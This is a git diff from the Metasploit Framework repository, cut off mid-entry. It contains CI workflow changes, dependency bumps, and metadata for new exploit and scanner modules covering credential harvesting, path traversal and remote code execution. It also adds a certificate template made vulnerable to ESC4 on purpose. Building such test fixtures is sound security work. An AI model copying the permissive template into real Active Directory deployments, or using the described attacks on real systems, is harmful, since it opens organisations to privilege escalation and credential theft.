Fix 404 link in eicar.txt (#19912 )

Updated the link to EICAR's test-file as the old one returns 404
correct password in hashes table (#19911 )
2025-02-27 16:17:10 +00:00 · 2025-02-27 15:15:45 +00:00 · 2025-02-27 14:35:25 +00:00 · 2025-02-27 15:28:27 +01:00 · 2025-02-27 15:25:50 +01:00 · 2025-02-27 03:33:05 -06:00
225 changed files with 14825 additions and 2864 deletions
@@ -66,7 +66,7 @@ jobs:
          - windows-2019
          - ubuntu-20.04
        ruby:
-          - 3.1.5
+          - '3.2'
        include:
          # Powershell
          - { command_shell: { name: powershell }, os: windows-2019 }
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.1'
+          - '3.2'

    name: Lint msftidy
    steps:
@@ -30,11 +30,11 @@ on:
        type: boolean

 jobs:
-  # Compile Java Meterpreter via docker if required, we can't always do this on the
+  # Compile the Meterpreter payloads via docker if required, we can't always do this on the
  # host environment (i.e. for macos). So it instead gets compiled first on a linux
  # host, then the artifacts are copied back to the host later
-  java_meterpreter_compilation:
-    name: Compile Java Meterpreter
+  meterpreter_compilation:
+    name: Compile Meterpreter
    runs-on: ubuntu-latest
    if: ${{ inputs.build_metasploit_payloads }}

@@ -46,21 +46,22 @@ jobs:
          path: metasploit-payloads
          ref: ${{ inputs.metasploit_payloads_commit }}

-      - name: Build Java and Android payloads
+      - name: Build Meterpreter payloads
        run: |
-          mkdir $(pwd)/java-artifacts
-          docker run --rm -w "$(pwd)" -v "$(pwd):$(pwd)" rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "set -x && cd metasploit-payloads/java && mvn package -Dandroid.sdk.path=/usr/local/android-sdk -Dandroid.release=true -Ddeploy.path=../../java-artifacts -Dmaven.test.skip=true -P deploy && mvn -Dmaven.test.skip=true -Ddeploy.path=../../java-artifacts -P deploy package"
+          mkdir $(pwd)/meterpreter-artifacts
+          docker run --rm -w $(pwd) -v $(pwd):$(pwd) rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "cd metasploit-payloads/gem && rake create_dir && rake win_copy && rake php_prep && rake java_prep && rake python_prep && rake create_manifest && rake build"
+          cp $(pwd)/metasploit-payloads/gem/pkg/metasploit-payloads-* $(pwd)/meterpreter-artifacts

-      - name: Store Java artifacts
+      - name: Store Meterpreter artifacts
        uses: actions/upload-artifact@v4
        with:
-          name: java-artifacts
-          path: java-artifacts
+          name: meterpreter-artifacts
+          path: meterpreter-artifacts

  # Run all test individually, note there is a separate final job for aggregating the test results
  test:
-    needs: java_meterpreter_compilation
-    if: always() && (needs.java_meterpreter_compilation.result == 'success' || needs.java_meterpreter_compilation.result == 'skipped')
+    needs: meterpreter_compilation
+    if: always() && (needs.meterpreter_compilation.result == 'success' || needs.meterpreter_compilation.result == 'skipped')

    strategy:
      fail-fast: false
@@ -70,7 +71,7 @@ jobs:
          - windows-2019
          - ubuntu-20.04
        ruby:
-          - 3.1.5
+          - '3.2'
        meterpreter:
          # Python
          - { name: python, runtime_version: 3.6 }
@@ -208,28 +209,28 @@ jobs:
        working-directory: metasploit-framework

      - uses: actions/download-artifact@v4
-        name: Download Java meterpreter
-        id: download_java_meterpreter
-        if: ${{ matrix.meterpreter.name == 'java' && inputs.build_metasploit_payloads }}
+        name: Download Meterpreter
+        id: download_meterpreter
+        if: ${{ matrix.meterpreter.name != 'mettle' && inputs.build_metasploit_payloads }}
        with:
          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
          path: raw-data

-      - name: Extract Java Meterpreter (Unix)
-        if: ${{ matrix.meterpreter.name == 'java' && runner.os != 'Windows' && inputs.build_metasploit_payloads }}
+      - name: Extract Meterpreter (Unix)
+        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' && inputs.build_metasploit_payloads }}
        shell: bash
        run: |
          set -x
-          download_path=${{steps.download_java_meterpreter.outputs.download-path}}
-          cp -r  $download_path/java-artifacts/data/* ./metasploit-framework/data
+          download_path=${{steps.download_meterpreter.outputs.download-path}}
+          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework

-      - name: Extract Java Meterpreter (Windows)
-        if: ${{ matrix.meterpreter.name == 'java' && runner.os == 'Windows' && inputs.build_metasploit_payloads }}
+      - name: Extract Meterpreter (Windows)
+        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os == 'Windows' && inputs.build_metasploit_payloads }}
        shell: bash
        run: |
          set -x
-          download_path=$(cygpath -u '${{steps.download_java_meterpreter.outputs.download-path}}')
-          cp -r  $download_path/java-artifacts/data/* ./metasploit-framework/data
+          download_path=$(cygpath -u '${{steps.download_meterpreter.outputs.download-path}}')
+          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework

      - name: Install mettle gem
        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
@@ -250,32 +251,6 @@ jobs:
          path: metasploit-payloads
          ref: ${{ inputs.metasploit_payloads_commit }}

-      - name: Get metasploit-payloads version
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        shell: bash
-        run: echo "METASPLOIT_PAYLOADS_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" gem/lib/metasploit-payloads/version.rb)" | tee -a $GITHUB_ENV
-        working-directory: metasploit-payloads
-
-      - name: Build metasploit-payloads gem
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        run: gem build ./gem/metasploit-payloads.gemspec
-        working-directory: metasploit-payloads
-
-      - name: Copy metasploit-payloads gem into metasploit-framework
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        shell: bash
-        run: cp ../metasploit-payloads/metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem .
-        working-directory: metasploit-framework
-
-      - name: Install metasploit-payloads gem
-        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
-        run: |
-          bundle exec gem install metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem
-          bundle config unset deployment
-          bundle update metasploit-payloads
-          bundle install
-        working-directory: metasploit-framework
-
      - name: Build Windows payloads via Visual Studio 2019 Build (Windows)
        shell: cmd
        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2019' && inputs.build_metasploit_payloads }}
@@ -294,12 +269,39 @@ jobs:
          make.bat
        working-directory: metasploit-payloads

-      - name: Build PHP, Python and Windows payloads
-        if: ${{ (matrix.meterpreter.name == 'php' || matrix.meterpreter.name == 'python' || runner.os == 'Windows') && inputs.build_metasploit_payloads }}
-        run: |
-          make install-php install-python install-windows
+      - name: Get metasploit-payloads version
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        shell: bash
+        run: echo "METASPLOIT_PAYLOADS_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" gem/lib/metasploit-payloads/version.rb)" | tee -a $GITHUB_ENV
        working-directory: metasploit-payloads

+      - name: Install metasploit-payloads gem
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        run: |
+          bundle exec gem install metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem
+        working-directory: metasploit-framework
+
+      - name: Remove metasploit-payloads version from metasploit-framework.gemspec
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' }}
+        run: |
+          ruby -pi -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
+        working-directory: metasploit-framework
+
+      - name: Remove metasploit-payloads version from metasploit-framework.gemspec (Windows)
+        if: ${{ inputs.build_metasploit_payloads && (runner.os == 'Windows' && matrix.meterpreter.name != 'windows_meterpreter') && matrix.meterpreter.name != 'mettle' }}
+        shell: cmd
+        run: |
+          ruby -pi.bak -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
+        working-directory: metasploit-framework
+
+      - name: Bundle update/install metasploit-payloads gem
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        run: |
+          bundle config unset deployment
+          bundle update metasploit-payloads
+          bundle install
+        working-directory: metasploit-framework
+
      - name: Acceptance
        env:
          SPEC_HELPER_LOAD_METASPLOIT: false
@@ -60,7 +60,6 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.1'
          - '3.2'
          - '3.3'
          - '3.4'
@@ -69,7 +68,7 @@ jobs:
          - ubuntu-latest
        include:
          - os: ubuntu-latest
-            ruby: '3.1'
+            ruby: '3.2'
            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
@@ -0,0 +1,98 @@
+name: Weekly Data and External Tool Updater
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: write
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: write
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  schedule:
+    # Run once a week (e.g., every Monday at 01:00 UTC)
+    - cron: '0 1 * * 1'
+  workflow_dispatch: # Allows manual triggering from the Actions tab
+
+jobs:
+  update-data-files:
+    runs-on: ubuntu-latest
+
+    if: github.repository_owner == 'rapid7'
+
+    env:
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+
+      - uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: Run Ruby updater scripts
+        run: |
+          ruby tools/dev/update_wordpress_vulnerabilities.rb
+          ruby tools/dev/update_joomla_components.rb
+          ruby tools/dev/update_user_agent_strings.rb
+          ruby tools/dev/check_external_scripts.rb -u
+      - name: Remove vendor folder # prevent git from adding it
+        run: rm -rf vendor
+
+      - name: Create Pull Request
+        uses: peter-evans/create-pull-request@v7
+        with:
+          token: ${{ secrets.GITHUB_TOKEN }}
+          commit-message: Update report
+          base: master
+          branch: weekly-updates
+          committer: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
+          author: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
+          title: "Weekly Data Update"
+          draft: false
+          body: |
+            This pull request was created automatically by a GitHub Action to update data files and external scripts.
+            The following tools were run:
+            - ruby tools/dev/update_wordpress_vulnerabilities.rb
+            - ruby tools/dev/update_joomla_components.rb
+            - ruby tools/dev/update_user_agent_strings.rb
+            - ruby tools/dev/check_external_scripts.rb -u
+            ## Verification
+            ### Wordpress/Joomla Files
+            - [ ] Do a sanity check, do the additions look legit?
+            - [ ] Start `msfconsole`
+            - [ ] `use modules/auxiliary/scanner/http/wordpress_scanner`
+            - [ ] **Verify** it runs
+            ### JTR Files
+            - [ ] Do a sanity check, do the additions look legit?
+            - [ ] See https://docs.metasploit.com/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#example-hashes for hashes and cracking
+            ### SharpHound
+            - [ ] Start `msfconsole`
+            - [ ] get a shell on a DC or box connected to a dc
+            - [ ] `use post/windows/gather/bloodhound`
+            - [ ] `set session`
+            - [ ] `run`
+            - [ ] **Verify** it runs w/o erroring
+            - [ ] `set method disk`
+            - [ ] **Verify** it runs w/o erroring
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.46)
+    metasploit-framework (6.4.52)
      aarch64
      abbrev
      actionpack (~> 7.0.0)
@@ -307,7 +307,7 @@ GEM
      activesupport (~> 7.0)
      railties (~> 7.0)
    metasploit-payloads (2.0.189)
-    metasploit_data_models (6.0.5)
+    metasploit_data_models (6.0.6)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
      arel-helpers
@@ -323,7 +323,7 @@ GEM
      logger
      mime-types-data (~> 3.2015)
    mime-types-data (3.2024.1001)
-    mini_portile2 (2.8.7)
+    mini_portile2 (2.8.8)
    minitest (5.25.1)
    mqtt (0.6.0)
    msgpack (1.6.1)
@@ -346,7 +346,7 @@ GEM
    network_interface (0.0.4)
    nexpose (7.3.0)
    nio4r (2.7.4)
-    nokogiri (1.16.7)
+    nokogiri (1.18.2)
      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
    nori (2.7.1)
@@ -90,15 +90,15 @@ memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.3, "New BSD"
 metasploit-credential, 6.0.11, "New BSD"
-metasploit-framework, 6.4.46, "New BSD"
+metasploit-framework, 6.4.52, "New BSD"
 metasploit-model, 5.0.2, "New BSD"
 metasploit-payloads, 2.0.189, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 6.0.5, "New BSD"
+metasploit_data_models, 6.0.6, "New BSD"
 metasploit_payloads-mettle, 1.0.35, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
 mime-types, 3.6.0, MIT
 mime-types-data, 3.2024.1001, MIT
-mini_portile2, 2.8.7, MIT
+mini_portile2, 2.8.8, MIT
 minitest, 5.25.1, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
@@ -115,7 +115,7 @@ net-ssh, 7.3.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.7.4, "MIT, Simplified BSD"
-nokogiri, 1.16.7, MIT
+nokogiri, 1.18.2, MIT
 nori, 2.7.1, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
@@ -10,6 +10,8 @@ info:
  x-cortex-type: service
  x-cortex-domain-parents:
  - tag: metasploit
+  x-cortex-groups:
+  - exposure:external-ship
 openapi: 3.0.1
 servers:
 - url: "/"
@@ -0,0 +1,30 @@
+---
+# Creates a template that will be vulnerable to ESC4 (certificate has weak edit permissions).
+# Fields are based on the SubCA template. For field descriptions,
+# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users (this is what makes the template vulnerable to ESC4)
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: 0
+pKICriticalExtensions:
+  - 2.5.29.19
+  - 2.5.29.15
+pKIExtendedKeyUsage:
+# Server Authentication OID (Not necessary although if left blank this template would also be vulnerable to ESC2)
+  - 1.3.6.1.5.5.7.3.1
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
+msPKI-Certificate-Name-Flag: 0x82000000
+msPKI-Minimal-Key-Size: 2048
@@ -13,4 +13,4 @@ responsible for corrupting the Metasploit Framework installation.

 For more information about EICAR, please see the following web site:

-http://www.eicar.org/anti_virus_test_file.htm
+https://www.eicar.org/download-anti-malware-testfile/
@@ -9,7 +9,7 @@ ehdr:                            ; Elf32_Ehdr
  db    0, 0, 0, 0,  0, 0, 0, 0  ;
  dw    2                        ;   e_type       = ET_EXEC for an executable
  dw    0xB7                     ;   e_machine    = AARCH64
-  dd    0                        ;   e_version
+  dd    1                        ;   e_version
  dq    _start                   ;   e_entry
  dq    phdr - $$                ;   e_phoff
  dq    0                        ;   e_shoff
@@ -6515,7 +6515,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-11-18 15:32:08 +0000",
+    "mod_time": "2025-01-29 14:25:33 +0000",
    "path": "/modules/auxiliary/admin/kerberos/get_ticket.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/get_ticket",
@@ -6802,7 +6802,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-10-22 14:41:02 +0000",
+    "mod_time": "2025-02-13 16:46:31 +0000",
    "path": "/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/ad_cs_cert_template",
@@ -6937,7 +6937,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-05-02 13:57:13 +0000",
+    "mod_time": "2025-02-13 16:46:31 +0000",
    "path": "/modules/auxiliary/admin/ldap/rbcd.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/rbcd",
@@ -10357,6 +10357,67 @@

    ]
  },
+  "auxiliary_admin/scada/mypro_mgr_creds": {
+    "name": "mySCADA myPRO Manager Credential Harvester (CVE-2025-24865 and CVE-2025-22896)",
+    "fullname": "auxiliary/admin/scada/mypro_mgr_creds",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2025-02-13",
+    "type": "auxiliary",
+    "author": [
+      "Michael Heinzl"
+    ],
+    "description": "Credential Harvester in MyPRO Manager <= v1.3 from mySCADA.\n          The product suffers from a broken authentication vulnerability (CVE-2025-24865) for certain functions. One of them is the configuration page for notifications, which returns the cleartext credentials (CVE-2025-22896) before correctly veryfing that the associated request is coming from an authenticated and authorized entity.",
+    "references": [
+      "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16",
+      "CVE-2025-24865",
+      "CVE-2025-22896"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 34022,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-02-20 15:40:05 +0000",
+    "path": "/modules/auxiliary/admin/scada/mypro_mgr_creds.rb",
+    "is_install_path": true,
+    "ref_name": "admin/scada/mypro_mgr_creds",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_admin/scada/pcom_command": {
    "name": "Unitronics PCOM remote START/STOP/RESET command",
    "fullname": "auxiliary/admin/scada/pcom_command",
@@ -20398,6 +20459,68 @@
      }
    ]
  },
+  "auxiliary_gather/argus_dvr_4_lfi_cve_2018_15745": {
+    "name": "Argus Surveillance DVR 4.0.0.0 - Directory Traversal",
+    "fullname": "auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Maxwell Francis",
+      "John Page"
+    ],
+    "description": "This module leverages an unauthenticated arbitrary file read for\n          the Argus Surveillance 4.0.0.0 system which never saw an update since.\n          As this is a Windows related application we recommend looking for common\n          Windows file locations, especially C:\\ProgramData\\PY_Software\\Argus Surveillance DVR\\DVRParams.ini\n          which houses another vulnerability in the Argus Surveillance system. This directory traversal vuln\n          is being tracked as CVE-2018-15745",
+    "references": [
+      "URL-https://argus-surveillance-dvr.soft112.com/#google_vignette",
+      "EDB-45296",
+      "CVE-2018-15745"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-01-31 12:49:35 +0000",
+    "path": "/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb",
+    "is_install_path": true,
+    "ref_name": "gather/argus_dvr_4_lfi_cve_2018_15745",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/asrep": {
    "name": "Find Users Without Pre-Auth Required (ASREP-roast)",
    "fullname": "auxiliary/gather/asrep",
@@ -24094,9 +24217,10 @@
    "type": "auxiliary",
    "author": [
      "Grant Willcox",
-      "Spencer McIntyre"
+      "Spencer McIntyre",
+      "jheysel-r7"
    ],
-    "description": "This module allows users to query a LDAP server for vulnerable certificate\n          templates and will print these certificates out in a table along with which\n          attack they are vulnerable to and the SIDs that can be used to enroll in that\n          certificate template.\n\n          Additionally the module will also print out a list of known certificate servers\n          along with info about which vulnerable certificate templates the certificate server\n          allows enrollment in and which SIDs are authorized to use that certificate server to\n          perform this enrollment operation.\n\n          Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, ESC13,\n          and ESC15. The module is limited to checking for these techniques due to them being identifiable remotely from\n          a normal user account by analyzing the objects in LDAP.",
+    "description": "This module allows users to query a LDAP server for vulnerable certificate\n          templates and will print these certificates out in a table along with which\n          attack they are vulnerable to and the SIDs that can be used to enroll in that\n          certificate template.\n\n          Additionally the module will also print out a list of known certificate servers\n          along with info about which vulnerable certificate templates the certificate server\n          allows enrollment in and which SIDs are authorized to use that certificate server to\n          perform this enrollment operation.\n\n          Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, ESC4,\n          ESC13, and ESC15. The module is limited to checking for these techniques due to them being identifiable\n          remotely from a normal user account by analyzing the objects in LDAP.",
    "references": [
      "URL-https://posts.specterops.io/certified-pre-owned-d95910965cd2",
      "URL-https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53",
@@ -24112,7 +24236,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-10-10 09:24:48 +0000",
+    "mod_time": "2025-02-11 20:49:08 +0000",
    "path": "/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_esc_vulnerable_cert_finder",
@@ -24224,7 +24348,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-05-02 13:57:13 +0000",
+    "mod_time": "2025-01-22 16:15:52 +0000",
    "path": "/modules/auxiliary/gather/ldap_query.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_query",
@@ -29308,7 +29432,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2023-12-15 13:40:55 +0000",
+    "mod_time": "2025-01-27 08:35:00 +0000",
    "path": "/modules/auxiliary/scanner/dcerpc/petitpotam.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/petitpotam",
@@ -39611,6 +39735,67 @@

    ]
  },
+  "auxiliary_scanner/http/netalertx_file_read": {
+    "name": " NetAlertX File Read Vulnerability",
+    "fullname": "auxiliary/scanner/http/netalertx_file_read",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2025-01-30",
+    "type": "auxiliary",
+    "author": [
+      "chebuya",
+      "msutovsky-r7"
+    ],
+    "description": "This module exploits improper authentication in logs.php endpoint. An unathenticated attacker can request log file and read any file due path traversal vulnerability.",
+    "references": [
+      "CVE-2024-48766",
+      "URL-https://rhinosecuritylabs.com/research/cve-2024-46506-rce-in-netalertx/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 20211,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-02-25 10:21:31 +0000",
+    "path": "/modules/auxiliary/scanner/http/netalertx_file_read.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/netalertx_file_read",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_scanner/http/netdecision_traversal": {
    "name": "NetDecision NOCVision Server Directory Traversal",
    "fullname": "auxiliary/scanner/http/netdecision_traversal",
@@ -41798,6 +41983,71 @@

    ]
  },
+  "auxiliary_scanner/http/simplehelp_toolbox_path_traversal": {
+    "name": "SimpleHelp Path Traversal Vulnerability CVE-2024-57727",
+    "fullname": "auxiliary/scanner/http/simplehelp_toolbox_path_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2025-01-12",
+    "type": "auxiliary",
+    "author": [
+      "horizon3ai",
+      "imjdl",
+      "jheysel-r7"
+    ],
+    "description": "There exists a path traversal vulnerability in the /toolbox-resource endpoint that enables unauthenticated\n          remote attackers to download arbitrary files from the SimpleHelp server via crafted HTTP requests",
+    "references": [
+      "URL-https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/",
+      "URL-https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier",
+      "URL-https://rustlang.rs/posts/simple-help/",
+      "URL-https://attackerkb.com/topics/G4CTOrbDx0/cve-2024-57727",
+      "CVE-2024-57727"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-02-24 10:26:01 +0000",
+    "path": "/modules/auxiliary/scanner/http/simplehelp_toolbox_path_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/simplehelp_toolbox_path_traversal",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_scanner/http/smt_ipmi_49152_exposure": {
    "name": "Supermicro Onboard IPMI Port 49152 Sensitive File Exposure",
    "fullname": "auxiliary/scanner/http/smt_ipmi_49152_exposure",
@@ -47267,6 +47517,66 @@

    ]
  },
+  "auxiliary_scanner/ivanti/login_scanner": {
+    "name": "Ivanti Connect Secure HTTP Scanner",
+    "fullname": "auxiliary/scanner/ivanti/login_scanner",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "msutovsky-r7"
+    ],
+    "description": "This module will perform authentication scanning against Ivanti Connect Secure",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-02-03 06:34:49 +0000",
+    "path": "/modules/auxiliary/scanner/ivanti/login_scanner.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/ivanti/login_scanner",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "account-lockouts"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_scanner/jenkins/jenkins_udp_broadcast_enum": {
    "name": "Jenkins Server Broadcast Enumeration",
    "fullname": "auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum",
@@ -47434,7 +47744,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-10-10 17:17:02 +0000",
+    "mod_time": "2025-01-29 11:10:30 +0000",
    "path": "/modules/auxiliary/scanner/ldap/ldap_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ldap/ldap_login",
@@ -56213,7 +56523,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2024-06-03 11:02:15 +0000",
+    "mod_time": "2025-01-29 11:10:30 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
@@ -62254,7 +62564,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-11-12 18:23:31 +0000",
+    "mod_time": "2025-02-04 15:41:33 +0000",
    "path": "/modules/auxiliary/server/relay/esc8.rb",
    "is_install_path": true,
    "ref_name": "server/relay/esc8",
@@ -70559,6 +70869,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/beyondtrust_pra_rs_unauth_rce": {
+    "name": "BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) unauthenticated Remote Code Execution",
+    "fullname": "exploit/linux/http/beyondtrust_pra_rs_unauth_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-12-16",
+    "type": "exploit",
+    "author": [
+      "sfewer-r7"
+    ],
